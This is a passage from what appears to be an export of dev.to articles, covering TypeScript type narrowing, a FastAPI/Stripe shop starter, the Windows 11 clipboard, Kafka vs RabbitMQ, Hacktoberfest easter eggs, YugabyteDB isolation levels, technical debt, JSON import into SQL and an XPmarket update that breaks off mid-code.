input: Date | null | undefined | string | Person | Car
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
  } else if (input.category === "Car") { // failure: 'category' exists on neither Person nor Car
return diffInYears(input.yearOfConstruction);
} else {
return diffInYears(input.birthday);
}
}
```
In such a case, we can make use of the `in` type guard. With `in`, we can check whether an object has a certain property. So if the choice is between `Person` and `Car` and the property `birthday` is present, the type can only be `Person`.
```typescript
type Person = {
birthday: Date;
};
type Car = {
yearOfConstruction: Date;
};
function calcAge(
input: Date | null | undefined | string | Person | Car
): number {
  if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if ("birthday" in input) {
return diffInYears(input.birthday);
} else {
return diffInYears(input.yearOfConstruction);
}
}
```
## 8. Type Predicate
Our next type guard is not a real type guard in the strict sense; it is a kind of compromise.
First, let's replace the type `Car` with a type `PersonJson`. It also has a property `birthday`, but of type `string`.
We could get away with `typeof input.birthday === 'string'`. This is a combination of the `typeof` and the discriminated union type guards:
```typescript
type Person = {
birthday: Date;
};
type PersonJson = {
birthday: string;
};
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (typeof input.birthday === "string") {
return diffInYears(parse(input.birthday));
} else {
return diffInYears(input.birthday);
}
}
```
This code compiles and everything looks alright, but it is not perfect. If we assigned `input` to a new variable inside the last `else if` branch, we would see that TypeScript identifies the type not as `PersonJson` but as `Person | PersonJson`.
This is the point in time, where we reached the limits of TypeScript. Fortunately, it doesn't mean game over.
Whenever TypeScript runs out of options, it gives us the possibility to come up with a function that contains validation code for a particular type.
In a way, this is a compromise. We can write whatever we want in that function, as long as we return `true` or `false`. TypeScript will trust us.
This special function is called a "type predicate", and for `Person` it looks like this:
```typescript
function isPerson(value: Person | PersonJson): value is Person {
return value.birthday instanceof Date;
}
```
Please note the special notation in the position where the return type normally goes.
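One caveat before we use it: the compiler does not verify the predicate's body. A deliberately wrong predicate like the one below compiles without complaint, so the validation logic is entirely our responsibility:

```typescript
// This predicate lies: it always claims the value is a string.
function isString(value: unknown): value is string {
  return true; // bug on purpose: TypeScript trusts the return value blindly
}

const n: unknown = 42;
if (isString(n)) {
  // Statically n is now string, but at runtime it is still a number:
  console.log(typeof n); // "number"
}
```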
We use the predicate like any other function and place it in the last `else if` condition:
```typescript
type Person = {
birthday: Date;
};
type PersonJson = {
birthday: string;
};
function isPerson(value: Person | PersonJson): value is Person {
return value.birthday instanceof Date;
}
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
if (!input) {
return 0;
} else if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (isPerson(input)) {
return diffInYears(input.birthday);
} else {
return diffInYears(parse(input.birthday));
}
}
```
## 9. Type Narrowing against `unknown`
With type predicates, we can even deal with variables of type `unknown`. All it takes is an `if` condition with the type predicate and voilà, the problem is gone.
But we have to be careful and shouldn't trick ourselves. The type narrowing is only as good as our validation logic.
If we had a value of type `unknown` and wanted to verify that it has the "shape" of `Person`, we would have to come up with better code than the one we used before. By "shape", we mean any object literal or instance that has a property `birthday: Date`.
### 9.1. Manual Validation
A type-safe type predicate would look like this:
```typescript
function isPerson(value: unknown): value is Person {
return (
typeof value === "object" &&
value !== null &&
"birthday" in value &&
(value as { birthday: unknown }).birthday instanceof Date
);
}
```
What a huge amount of code! Unfortunately, it is necessary if we want to be fully type-safe.
The function shows another limitation of TypeScript's capabilities. Although we checked that `birthday` is a property of `value`, we still have to apply a type assertion before we can check that `birthday` is of type `Date`.
We can expect TypeScript's limitations to shrink over time, but at the moment it is what it is.
### 9.2. Automatic Validation: zod
We stay with type narrowing against the `unknown` type. Depending on the kind of application, we may have to deal with `unknown` quite often. Clearly, we don't want to write these huge type predicates by hand every time; that takes too much precious time.
Fortunately, it doesn't have to be like that. There are special libraries that do the validation automatically.
One of the most popular ones is "zod".
For every type, we first have to come up with a schema. This means we define the type programmatically and store it in a variable, so the schema information is also present at runtime.
The generated schema is then used inside of a type predicate to validate if a value is of that type or not.
With zod, our `isPerson` would look like that:
```typescript
const personSchema = z.object({
birthday: z.date(),
});
type Person = z.infer<typeof personSchema>;
function isPerson(value: unknown): value is Person {
return personSchema.safeParse(value).success;
}
```
First, we define the schema and store it as `personSchema`. With an existing schema, we can ask zod to generate the type automatically for us via `z.infer`. This simplifies things and also makes sure we don't have duplicate work when we change the `Person` type.
Then we use the method `safeParse`, which doesn't throw an error if the value is not of type `Person`; it returns the result via the `success` property.
This is much better than writing validation code manually all the time.
## 10. Assertion Functions
The last feature which is not a type guard, but comes in very handy, is the assertion function.
We return the number 0 in the first condition, when the value is `undefined`, `null`, or an empty string.
Returning 0 is one way to do it. The alternative is to throw an error.
If we throw an error, TypeScript's type narrowing will exclude `undefined` or `null` from the rest of the function's code.
An assertion function is a special function that does exactly that. When we call it, it narrows down the parameter similarly to a type guard, but it doesn't return a boolean. Instead, it guarantees that it throws an error if the value is not of the specific type.
Dealing with types that should not be `undefined` or `null` is so common that TypeScript even provides a special type utility, named `NonNullable<T>`. This type utility means: whatever type `T` is, it is neither `undefined` nor `null`. Let's see how `NonNullable<T>` and the assertion function work in action:
```typescript
function assertNonNullable<T>(value: T): asserts value is NonNullable<T> {
if (value === undefined || value === null) {
throw new Error("undefined or null are not allowed");
}
}
function calcAge(
input: Date | null | undefined | string | Person | PersonJson
): number {
assertNonNullable(input);
if (typeof input === "string") {
return diffInYears(parse(input));
} else if (input instanceof Date) {
return diffInYears(input);
} else if (isPerson(input)) {
return diffInYears(input.birthday);
} else {
return diffInYears(parse(input.birthday));
}
}
```
One final question must be allowed: when we throw an error anyway, why don't we just remove `undefined` and `null` from the parameter's union type in the first place? Like `function calcAge(value: Date | string | Person | PersonJson): number {}`?
Well, because the caller might force us to include them. For example, in Angular, a form control's value is `undefined` when the control is disabled. We could argue that our program logic doesn't allow `undefined` because we never provide a disable function. Nevertheless, the form library's type includes it, and that's why it is among the parameter's types.
## 11. Summary
This article showed various techniques for dealing with union types and narrowing them down to one specific type. TypeScript is able to validate these patterns, which means we are not trying to outsmart the compiler but to produce code that is as type-safe as possible.
We should always favour type narrowing over type assertion. It means more effort, but we don't have to sacrifice type-safety.
Type-safety is the main reason why we use TypeScript over JavaScript: we want as much type-safety as possible. From that perspective, the proper usage of type narrowing is the most important TypeScript skill for an application developer.
| rainerhahnekamp |
1,235,224 | Stripe, FastAPI, Bootstrap 5 - Free eCommerce | Simple eCommerce powered by FastAPI and Stripe that uses a modern Bootstrap 5 design - Open-source project. | 0 | 2022-10-29T09:24:09 | https://www.admin-dashboards.com/free-ecommerce-fastapi-stripe-bootstrap-5/ | stripe, fastapi, bootstrap5, ecommerce | ---
title: Stripe, FastAPI, Bootstrap 5 - Free eCommerce
published: true
description: Simple eCommerce powered by FastAPI and Stripe that uses a modern Bootstrap 5 design - Open-source project.
tags: stripe, fastapi, bootstrap5, ecommerce
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wg2tqct1k6txz60zu4vp.jpg
canonical_url: https://www.admin-dashboards.com/free-ecommerce-fastapi-stripe-bootstrap-5/
---
Hello Coders!
This article presents a simple **eCommerce** starter powered by [Stripe, FastAPI](https://github.com/app-generator/ecommerce-fastapi-stripe) (for the backend logic) and **Bootstrap 5** (for styling). `The goal of this starter is to help programmers quickly bootstrap a decent and secure eCommerce solution with minimal effort`. Being **open-source** and released under the MIT license, the codebase can be easily extended, incorporated into commercial projects, or used in eLearning activities.
> *Thanks for reading!*
- 👉 [FastAPI & Stripe eCommerce](https://github.com/app-generator/ecommerce-fastapi-stripe) - source code
- 👉 Ask for [support](https://appseed.us/support/) (just in case)
A strong point of this project is the UI kit provided by `Creative-Tim`, a well-known agency that released the design for free. [Soft UI Design](https://www.creative-tim.com/product/soft-ui-design-system?AFFILIATE=128200) comes with 50+ components and reusable widgets, enough for at least a decent eCommerce project.
{% embed https://www.youtube.com/watch?v=bMFuQPwrh8A %}
---
## ✨ Product Highlights
This mini eCommerce loads the products from JSON files saved in the templates directory and builds dynamic pages based on this minimal information.
- ✅ Backend: **FastAPI**
- ✅ Payments: **Stripe**
- ✅ Design: [Soft UI Design](https://www.creative-tim.com/product/soft-ui-design-system?AFFILIATE=128200) (free version)
- ✅ Deployment: **Docker**
- ✅ Secure by default: No database is used
- ✅ MIT license
The minimal information required for a product definition can be found below:
```json
{
"name": "Air ZOOM Pegasus",
"price": 499,
"currency": "usd",
"short_description": "A workhorse built to help ..(truncated)..",
"full_description": "A workhorse built to help power ..(truncated).."
}
```
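To show how little parsing such a definition needs, here is a minimal, self-contained Python sketch (written for this article, not taken from the project's source). Note that Stripe's API expects amounts as integers in the smallest currency unit, so a USD price is converted to cents:

```python
import json

# The product definition from the snippet above, inlined for a runnable demo:
raw = """
{
  "name": "Air ZOOM Pegasus",
  "price": 499,
  "currency": "usd",
  "short_description": "A workhorse built to help ...",
  "full_description": "A workhorse built to help power ..."
}
"""
product = json.loads(raw)

# Stripe amounts are integers in the smallest currency unit (cents for USD):
amount_in_cents = product["price"] * 100
print(product["name"], amount_in_cents)  # Air ZOOM Pegasus 49900
```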
{% embed https://github.com/app-generator/ecommerce-fastapi-stripe %}
If your workstation has Docker installed, the product can be started via a single command typed in the terminal (make sure you're at the root of the sources).
```bash
$ docker-compose up --build
```
Once this command finishes executing, the app should be up & running in the browser.

---
> `Thanks for reading!` For more resources and support, please access:
- 🚀 Free [support](https://appseed.us/support/) via Email & Discord
- 👉 Other [tools](https://appseed.us/developer-tools/) and [free apps](https://appseed.us/apps/open-source/) provided by AppSeed
| sm0ke |
1,235,443 | How to Enable the Clipboard on a Windows 11 Laptop | Want to enable the clipboard in Windows 11 to access recently copied items? In this guide... | 0 | 2022-10-29T15:11:21 | https://dev.to/rino/cara-mengaktifkan-clipboard-di-laptop-windows-11-368 |  | Want to enable the clipboard in Windows 11 to access recently copied items? In this guide, we will share <a href="http://wh977764.ispot.cc/cara-menggunakan-clipboard-di-windows-11/">how to use the clipboard on a Windows 11 laptop</a>.
When we copy something on a computer, it is automatically transferred to the clipboard so it can be pasted. With Windows 11, you can not only paste multiple items from the clipboard history, but also pin frequently used items and sync the clipboard history to other devices through the cloud.
Clipboard history in Windows is limited to 4 MB and up to 25 copied entries. The following formats are supported: text, HTML, and bitmap. Except for pinned items, the clipboard history is cleared as soon as the PC reboots. Clipboard history is also synced across all devices connected to a Microsoft account.
When Windows 11 rolled out to the general public, it came with many new features and improvements that appeal to some people while causing problems for others. People have to learn new ways to interact with and manage Windows 11 because certain features and settings have changed significantly.
<h2>How to Enable the Clipboard in Windows 11</h2>
With the clipboard history feature enabled, Windows 11 will remember images, text, scripts, links, documents, and videos under 4 MB. However, Windows 11 will only store a maximum of 25 entries. Once the limit of 25 is reached, older items are removed from the clipboard history as new items arrive.
In addition, unless an item is pinned to the clipboard, the clipboard history list is reset every time the computer or laptop restarts.
So, to open or view the clipboard history in Windows 11, you have to enable it first. Here are the steps to enable it.
<ol>
<li>Press <strong>Windows + I</strong> at the same time to open <strong>Settings</strong> directly.</li>
<li>Select <strong>System</strong> from the left-hand panel, then click <strong>Clipboard</strong>.</li>
<li>In the right-hand <strong>Clipboard</strong> panel, flip the switch next to Clipboard history to the <strong>On</strong> position.</li>
</ol>
<h3>How to Open the Clipboard History in Windows 11</h3>
After enabling clipboard history, pressing <strong>Windows + V</strong> will bring up a list of recently copied items. A small window will open, with the most recently copied item at the top of the list.
<h4>Removing Items from the Clipboard History</h4>
<ul>
<li>Press <strong>Windows + I</strong> together to open the <strong>Settings</strong> menu.</li>
<li>Then tap <strong>System</strong> and click <strong>Clipboard</strong>.</li>
<li>Now, click the <strong>Clear</strong> button next to <strong>Clear clipboard data</strong> to delete the entire clipboard history.</li>
</ul>
If you don't want to use the Settings app to clear the clipboard history, you can use this method instead. Press the <strong>Windows + V</strong> shortcut and the clipboard window will appear. Click <strong>Clear all</strong> to remove every entry from the clipboard history at once.
Next, click the <strong>three-dot</strong> menu on any item you want to delete to remove it from the clipboard, then tap the <strong>Delete</strong> icon.
If you want to keep a particular item in the clipboard history for a long time, open the three-dot menu and select <strong>Pin</strong>. Pinned items will always remain in the clipboard history, even if you reboot the computer or use the Clear all option.
<h4>Disabling Clipboard History</h4>
To completely disable clipboard history, go to <strong>Settings</strong> > <strong>System</strong> > <strong>Clipboard</strong> and turn off <strong>Clipboard History</strong>.
That's how to open or access the clipboard history in Windows 11. Hopefully it's useful. | rino |
1,235,476 | Kafka Vs RabbitMQ | Distribution Kafka consumers get distributed through topic partitions. Each consumer... | 20,235 | 2022-10-29T16:12:42 | https://dev.to/rakeshkr2/kafka-vs-rabbitmq-4ioj | kafka, rabbitmq, beginners, difference | ## Distribution
**Kafka** consumers are distributed across topic partitions; each consumer consumes messages from a specific partition at a time.
For each **RabbitMQ** queue instance there are a number of consumers. These are known as competing consumers, as they compete with one another to consume messages, but each message can be processed just once.
## High Availability
With the help of zookeeper, it manages the state of the **Kafka** cluster and supports high availability.
Through clustering and high available queues provides high-performance data replication. Thus, **RabbitMQ** also provides high availability.
## Performance
**Kafka** can process millions of messages in a second with less number of the hardware.
**RabbitMQ** can also process millions of messages within a second, but it needs more number of the hardware.
## Replication
There are replicated brokers available in **Kafka**, which works when the master broker is down.
Here, queues are not automatically replicated. The configuration is mandatory.
## Multi subscriber
Multiple consumer types can subscribe to many messages to **Kafka**.
In **RabbitMQ**, although messages are routed to various queues, only one consumer from a queue can process the message.
{% embed https://youtu.be/Y2R8s8-MMBg %}
## Message Protocols
**Apache Kafka** supports primitives such as int8, int16, etc., as well as binary messages.
**RabbitMQ** supports any standard queue protocol, such as STOMP, AMQP, HTTP, etc.
## Message Ordering
In **Kafka**, message ordering is maintained only inside a partition, which guarantees that messages either all fail or all pass together.
**RabbitMQ** maintains ordering for flows through a single AMQP channel. In addition, it reorders retransmitted packets inside its queue logic, which spares the consumer from resequencing the buffers.
## Message lifetime
**Kafka** keeps a log file that persists all messages, which can be read back at any time.
Since **RabbitMQ** is a queue, messages are removed once they are consumed and the acknowledgment is received.
## Architecture
**Kafka** is a highly scalable pub/sub distributed messaging system. The Kafka cluster consists of brokers, topics, and partitions.
**RabbitMQ** is a general-purpose pub/sub message broker. Its architecture differs from Kafka's, as it is built around queues.
## Use Cases
**Kafka** is mainly used for streaming data.
Web servers mainly use **RabbitMQ** for immediate responses to requests.
## Transactions
**Kafka** supports transactions that exhibit a read-process-write pattern performed to/from Kafka topics.
**RabbitMQ** does not guarantee atomicity, even when the transaction involves only a single queue.
## Language
**Apache Kafka** is written in Scala and runs on the JVM.
**RabbitMQ** is written in Erlang.
## Routing Support
**RabbitMQ** supports complex routing scenarios through its exchanges and bindings.
**Kafka** does not support complex routing scenarios out of the box.
## Developer Experience
With high growth, **Kafka** led to a good experience. ~~But, it only supports Java clients.~~
**RabbitMQ** carries mature client libraries that support Java, PHP, Python, Ruby, and many more.
| rakeshkr2 |
1,235,625 | Initial konva-svelte public pre-release | React for Konva? Of course! Vue for Konva? Of course. Finally, Svelte for Konva, here it goes... | 15,873 | 2022-10-29T21:41:19 | https://dev.to/projektorius96/initial-konva-svelte-public-pre-release-3mfa |  | React for Konva? Of course! Vue for Konva? Of course. Finally, Svelte for Konva, here it goes:
[svelte-konva](https://github.com/projektorius96/svelte-konva/releases/tag/v1.0.0) | projektorius96 | |
1,236,500 | Easter eggs in Hacktoberfest 🪺 | Floating shark 🦈 🎈 Enter the following command in your terminal to see - ascii art of a... | 20,298 | 2022-10-31T00:30:20 | https://dev.to/batunpc/easter-eggs-in-hacktoberfest-11ei | tutorial, opensource, productivity, showdev |
## Floating shark 🦈 🎈
Enter the following command in your terminal to see _[ascii art](https://www.asciiart.eu/)_ of a shark floating in the air with a heart-shaped balloon `❤`, telling you **DO Love** in 3D letters!
```sh
curl -s https://hacktoberfest.com/profile/ | head -n40 | tail -n40 | tail -n39
```
> **Note**: Ensure that you have [curl](https://curl.se/) installed. Install it with `sudo apt install curl` or `brew install curl` if you are on macOS.
I had to pipe the `curl` request through a bunch of `head` and `tail` commands just to capture the `ASCII Art` of the shark.
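For reference, that slice (keep lines 2 through 40) can be expressed with a single `sed` call; the snippet below verifies the equivalence on generated input instead of the live page:

```sh
# head -n40 | tail -n40 | tail -n39 keeps lines 2 through 40 of the input;
# sed can do the same in one step:
seq 100 | head -n40 | tail -n40 | tail -n39 > pipe_slice.txt
seq 100 | sed -n '2,40p' > sed_slice.txt
diff pipe_slice.txt sed_slice.txt && echo "identical"
```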
### Even cooler 🌈
Pipe the above command with `lolcat` to see the shark in rainbow colors!
```sh
curl -s https://hacktoberfest.com/profile/ | head -n40 | tail -n40 | tail -n39 | lolcat
```
> **Note**: Ensure that you have [lolcat](https://github.com/jaseg/lolcat) - `brew install lolcat`
It will look something like this -

You could also simply view the shark by visiting [Hacktoberfest profile](https://hacktoberfest.com/profile/) and check the console from dev tools.
## Progress report
You can see the progress report of your PRs by visiting your [Hacktoberfest profile](https://hacktoberfest.com/profile/). Initially, the status of your PRs will be `0/4`, and as you open more PRs the status will change to `1/4`, `2/4`, and so on. If you have completed all 4 PRs and keep opening more, the status will look something like `4 + .. /4`. Currently, I have completed all 4 PRs plus 1 more, so the status looks like this - `4 + 1 /4`.

## Dark mode
I haven't participated in Hacktoberfest before, but I have heard that only white t-shirts used to be available. This year, you can choose between a white or dark t-shirt.
## Dev badge
Dev has a special and unique-looking badge for every Hacktoberfest. Once you complete 4 PRs, you will be rewarded with a special badge along with this message.

The badge of this year looks fascinating -

## Holopin
I quite often enjoy messing with my [badge board](https://www.holopin.io/@batunpc) on [Holopin](https://www.holopin.io/); this board lets me pin my badges and present the Hacktoberfest achievements I have made. Holopin was introduced this year along with Hacktoberfest, and if you had an account, you would get a unique badge for each PR you made. This was one of the factors that encouraged me to do more PRs.
The [badge board](https://www.holopin.io/@batunpc) looks like this -

You can adjust the badges by `Shift + Click` and `Drag` to move them around or `Command + Click` to rotate. They also provide a Markdown code to embed the badge board in your README.md file.
## palpatine
I have been developing a CLI tool called [palpatine](https://github.com/batunpc/palpatine) for a while now. It is a static site generator (SSG) written in C++, still under development, and ready for the community's support on GitHub. This Hacktoberfest I experienced the role of a contributor in open source, but next Hacktoberfest I will be participating as a maintainer of palpatine!
| batunpc |
1,236,964 | How to set Read Committed in YugabyteDB | YugabyteDB is PostgreSQL compatible, which means that it supports all transaction isolation level,... | 0 | 2022-10-31T13:25:30 | https://dev.to/yugabyte/how-to-set-read-committed-in-yugabytedb-2m6c | yugabytedb, postgres, isolation, sql | YugabyteDB is [PostgreSQL compatible] (https://www.yugabyte.com/tech/postgres-compatibility/), which means that it supports all transaction isolation level, with the same behavior. In previous versions, the **Read Committed** isolation level was mapped to the higher **Repeatable Read** level, and this is still the default in the current version (2.14). Here is an example where I start YugabyteDB with all default `tserver` flags:
```sh
docker run --rm yugabytedb/yugabyte:2.14.4.0-b26 bash -c '
yugabyted start --tserver_flags="" --listen 0.0.0.0
cat /root/var/logs/{master,tserver}.err
until postgres/bin/pg_isready ; do sleep 0.1 ; done | uniq &&
ysqlsh -e <<SQL
show yb_effective_transaction_isolation_level;
set default_transaction_isolation="read committed";
show yb_effective_transaction_isolation_level;
SQL
'
```
Here, even when `read committed` is set at the PostgreSQL level (the default), the effective isolation shown by `yb_effective_transaction_isolation_level` is `repeatable read`. This read-only parameter was added to make it easy to query the effective isolation level:
```sql
Starting yugabyted...
server_version
---------------------
11.2-YB-2.14.4.0-b0
(1 row)
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
repeatable read
(1 row)
set default_transaction_isolation="read committed";
SET
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
repeatable read
(1 row)
```
However, when the true Read Committed semantics are enabled with the `yb_enable_read_committed_isolation` flag when starting the `tserver`:
```sh
docker run --rm yugabytedb/yugabyte:2.14.4.0-b26 bash -c '
yugabyted start --tserver_flags="yb_enable_read_committed_isolation=true"
cat /root/var/logs/{master,tserver}.err
until ysqlsh -c "show server_version" ; do sleep 1 ; done 2>/dev/null
ysqlsh -e <<SQL
show yb_effective_transaction_isolation_level;
set default_transaction_isolation="read committed";
show yb_effective_transaction_isolation_level;
SQL
'
```
The effective isolation level is Read Committed:
```sql
Starting yugabyted...
server_version
---------------------
11.2-YB-2.14.4.0-b0
(1 row)
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
read committed
(1 row)
set default_transaction_isolation="read committed";
SET
show yb_effective_transaction_isolation_level;
yb_effective_transaction_isolation_level
------------------------------------------
read committed
(1 row)
```
When you are porting an application written for PostgreSQL, you probably want this, because Read Committed is the only isolation level that doesn't require retry logic for serialization errors. This is also why the databases that do not support this level, claiming that higher isolation is better, are not PostgreSQL compatible: porting an application to them would require many changes in application design and code.
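To make the difference concrete, here is a hypothetical interleaved two-session sketch (the `accounts` table is made up, and the two sessions run in separate connections, so this is pseudocode rather than a runnable script):

```sql
-- Session A (repeatable read)            -- Session B (concurrent)
begin transaction isolation level repeatable read;
select balance from accounts where id = 1;
                                          -- update accounts set balance = balance - 10
                                          --   where id = 1;  (commits)
update accounts set balance = balance + 5 where id = 1;
-- ERROR: could not serialize access due to concurrent update
-- Session A must ROLLBACK and retry the whole transaction.
-- Under read committed, the same UPDATE simply waits for Session B
-- and then re-reads the latest committed row: no retry logic needed.
```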
Why isn't `yb_enable_read_committed_isolation=true` the default? The reason is backward compatibility, because this was implemented recently, but there is a good chance it will become the default soon. The commands in this blog post can help you know exactly which isolation level is in effect for a specific version.
| franckpachot |
1,236,988 | Technical Debt: The IT Credit Bureau | It is common to say that the quality of the code produced by the development team can cause losses... | 0 | 2022-10-31T15:39:14 | https://dev.to/juscelior/divida-tecnica-o-bureau-de-credito-da-ti-8hc |  | It is common to say that the quality of the code produced by the development team can cause financial losses. After all, what is the financial impact of not fixing a bug in the company's software? Will I spend more money to fix this bug?
<img width="100%" style="width:100%" src="https://media.giphy.com/media/WPtzThAErhBG5oXLeS/giphy.gif">
Measuring every possibility is a complex task, and I dare say there is no method that guarantees exactness (except for Doctor Strange); we always have to work with possibilities. However, it is possible to look back and realize that some decisions were bad and caused financial losses. The most illustrious case is the billion-dollar mistake:
## The billion-dollar mistake
[Tony Hoare](https://en.wikipedia.org/wiki/Tony_Hoare): the creator of the [_QuickSort_](https://pt.wikipedia.org/wiki/Quicksort) algorithm and a winner of the [Turing Award](https://pt.wikipedia.org/wiki/Pr%C3%AAmio_Turing) (the Nobel Prize of computing) added a simple feature to the [ALGOL](https://pt.wikipedia.org/wiki/ALGOL) language with the intent of improving the performance of applications written in it. The reasoning made perfect sense at the time because it seemed practical and easy to do. Several decades later, he expressed his regret at a conference:
> I call it my billion-dollar mistake…At that time, I was designing the first comprehensive type system for references in an object-oriented language. My goal was to ensure that all use of references should be absolutely safe, with checking performed automatically by the compiler.
> But I couldn’t resist the temptation to put in a null reference, simply because it was so easy to implement. This has led to innumerable errors, vulnerabilities, and system crashes, which have probably caused a billion dollars of pain and damage in the last forty years.
> – [Tony Hoare](https://en.wikipedia.org/wiki/Tony_Hoare), inventor of ALGOL W.
You can find the full video of that talk at this [link](https://www.infoq.com/presentations/Null-References-The-Billion-Dollar-Mistake-Tony-Hoare/).
## Impacts of Technical Debt
Do you believe technical debt has an impact that goes beyond wasted money?
Let's imagine this technical debt as a financial credit operation, with "technical debt" being the score that IT's credit bureau uses to track your record. If we don't pay this debt on time, our name can end up on a defaulters' register and, as a consequence, we suffer limitations in the future.
> A credit protection service, or credit bureau, is a credit information service that uses data on the payment record of individuals or companies to support credit decisions.
If you have ever had bad credit, banks may deny you credit for the rest of your life. The same can happen when technical debt is left unmanaged: as a consequence, the team's delivery speed becomes limited. You can hire more professionals to do the same work; in short, you spend more money to deliver fewer features. Don't believe it?

Brooks's law is an observation about software project management according to which adding manpower to a late software project makes it later. It was coined by [Fred Brooks](https://en.wikipedia.org/wiki/Fred_Brooks) in his 1975 book [The Mythical Man-Month: Essays on Software Engineering](https://www.amazon.com.br/m%C3%ADtico-homem-m%C3%AAs-ensaios-engenharia-software/dp/8550802530/).

If correlating financial impact with a bug is not simple, we can look at the impact of technical debt on team productivity instead. Recent research suggests that the average company loses 23-42% of developers' time to technical debt and bad code in general [1](https://dl.acm.org/doi/abs/10.1145/3524843.3528091). Another interesting finding is that software developers are often "forced" to introduce new technical debt as companies trade code quality for short-term gains such as new features [2](https://research.chalmers.se/publication/511450/file/511450_Fulltext.pdf).
Technical debt affects both developers' happiness and their job satisfaction [3](https://arxiv.org/abs/1904.08239). A professional does not always leave a company for financial reasons; other factors need to be considered. Beyond losing a resource, you lose that professional's knowledge. How do you measure the financial impact of that loss?
## Why Does This Happen?
In more than 13 years of experience, I can list these as the most common excuses:
> We don't have time to test this change; let's put it in production and monitor the environment to see what happens.
> There is a change management process (GMUD), but it is so complicated that if we follow it, the next deployment window is two months away, and the customer needs this feature now.
> Our test environment is not up to date, or not ready. That is when the answer isn't: the test environment is production (shared with our customers).
I recommend reading [The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win](https://www.amazon.com.br/projeto-f%C3%AAnix-Gene-Kim/dp/8550801895). The book avoids exclusionary technical jargon; it is a novel about the IT world. A bit of the story: the IT Operations team is seen by everyone as a source of problems, always getting in the way of the Phoenix Project, whose goal is to save the company. As a consequence, the company cannot assign the right people to strategic projects because they are busy putting out fires. Sounds familiar?

## The Role of Governance
A 2019 study by [IDC](https://www.idc.com/research/viewtoc.jsp?containerId=US44640719) predicted that by 2022, 90% of new digital services would be built as composite applications using public and internal services delivered via APIs, and that half of those services would leverage AI and machine learning.
If one of these services carries too much debt, it can create a cascade effect and harm other services. It would look something like this...
<img width="100%" style="width:100%" src="https://media.giphy.com/media/URqZ9jDNRfunXPvVhE/giphy.gif">
Well, the importance of a healthy codebase is widely undervalued at the enterprise level: more than 90% of IT managers lack processes and strategies for managing technical debt [4](https://www.infoq.com/articles/business-impact-code-quality/).
To be a high-performing organization, we need to be sensitive to customer needs, act on feedback, and keep innovating if we want to stay relevant in the market. And we need to do this in ever shorter product cycles. Managing this technical debt requires a specialized, dedicated area to drive strategy, focused on processes, programs, and skilled people.
| juscelior | |
1,237,631 | How to import json to SQL | How to import json to SQL | 0 | 2022-10-31T21:24:57 | https://dev.to/campelo/how-to-import-json-to-sql-bcj | json, sql, import, openjson | ---
title: How to import json to SQL
published: true
description: How to import json to SQL
tags: 'json, sql, import, openjson'
cover_image: 'https://raw.githubusercontent.com/campelo/documentation/master/posts/sql/assets/cover.png'
canonical_url: null
id: 1237631
---
###### :postbox: Contact :brazil: :us: :fr:
[Twitter](https://twitter.com/campelo87)
[LinkedIn](https://www.linkedin.com/in/flavio-campelo/?locale=en_US)
---
## Declaring a variable with json content
Json content:
```json
[
{
"name": "Flavio",
"code": "FLA-1",
"isDeleted": false
},
{
"name": "Contoso",
"code": "CON-1",
"isDeleted": true
}
]
```
```sql
-- SET JSON CONTENT TO A VARIABLE (@JSON)...
DECLARE @json NVARCHAR(max) = N'[
{
"name": "Flavio",
"code": "FLA-1",
"isDeleted": false
},
{
"name": "Contoso",
"code": "CON-1",
"isDeleted": true
}
]';
```
## Fill a temp table with json content
```sql
-- FILL #TEMP TABLE WITH JSON CONTENT...
SELECT firstName, code, IIF(isDeleted = 1, 0, 1) as active
INTO #temp
FROM OPENJSON(@json)
WITH (
firstName VARCHAR(50) '$.name',
code VARCHAR(10) '$.code',
isDeleted BIT '$.isDeleted'
);
```
## Show items from temp table
```sql
-- SHOW ITEMS FROM #TEMP TABLE
SELECT * FROM #temp;
```

## If you need to drop temp table
```sql
-- REMOVE A #TEMP TABLE...
DROP TABLE #temp;
```
## Typos or suggestions?
If you've found a typo, a sentence that could be improved or anything else that should be updated on this blog post, you can access it through a git repository and make a pull request. If you feel comfortable with github, instead of posting a comment, please go directly to https://github.com/campelo/documentation and open a new pull request with your changes.
| campelo |
1,237,737 | XPmarket Dev Update - October | Hey there! This has been an exciting month and our team is still burning the candle and both ends.... | 0 | 2022-11-01T13:30:00 | https://dev.to/xpmarket/xpmarket-dev-update-october-40k4 | xrpl, nft, dex, web3 | Hey there!
This has been an exciting month and our team is still burning the candle at both ends. As you may know, XLS-20d (the NFT update on XRPL) is live now! This has changed our plans and we are going to roll out a very fascinating and versatile solution for NFTs, but as you know, we like to write about what we have done rather than make promises. There were also a lot of interesting events and private meetings with remarkable people. Let's get started!
# Development
## Swap
Since the launch of our Swap functionality we received an incredible amount of positive feedback, especially about how this feature is integrated into each token’s page. We keep improving every aspect of what we have already released and Swaps is not an exception.
We have added “Price impact” to inform our users on how their order will affect the price. This element allows traders to estimate how much liquidity is present for the given trading pair and hence make an informed decision on what amount of tokens can be swapped without significant consequences.
How does it work exactly? The Swap feature does not operate like a traditional AMM, since AMMs are not implemented on XRPL yet. This means there will always be a spread between buy and sell orders. Hence, the price impact calculation starts from the first order you fill, rather than from the current price. So if you are buying a token, the price impact calculation starts from the first ask order, and if you are selling, then from the first bid order.
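The convention described above (measuring impact from the first order filled rather than from a mid price) can be sketched in Python. The order-book shape and function names here are illustrative assumptions, not XPmarket's actual implementation:

```python
def price_impact(order_book, amount):
    """Estimate price impact for a buy of `amount` tokens.

    `order_book` is a list of (price, size) ask orders, best price first.
    Per the convention above, impact is measured against the first
    order filled, not the current/mid price.
    """
    remaining = amount
    cost = 0.0
    first_price = order_book[0][0]
    for price, size in order_book:
        fill = min(remaining, size)   # take as much as this order offers
        cost += fill * price
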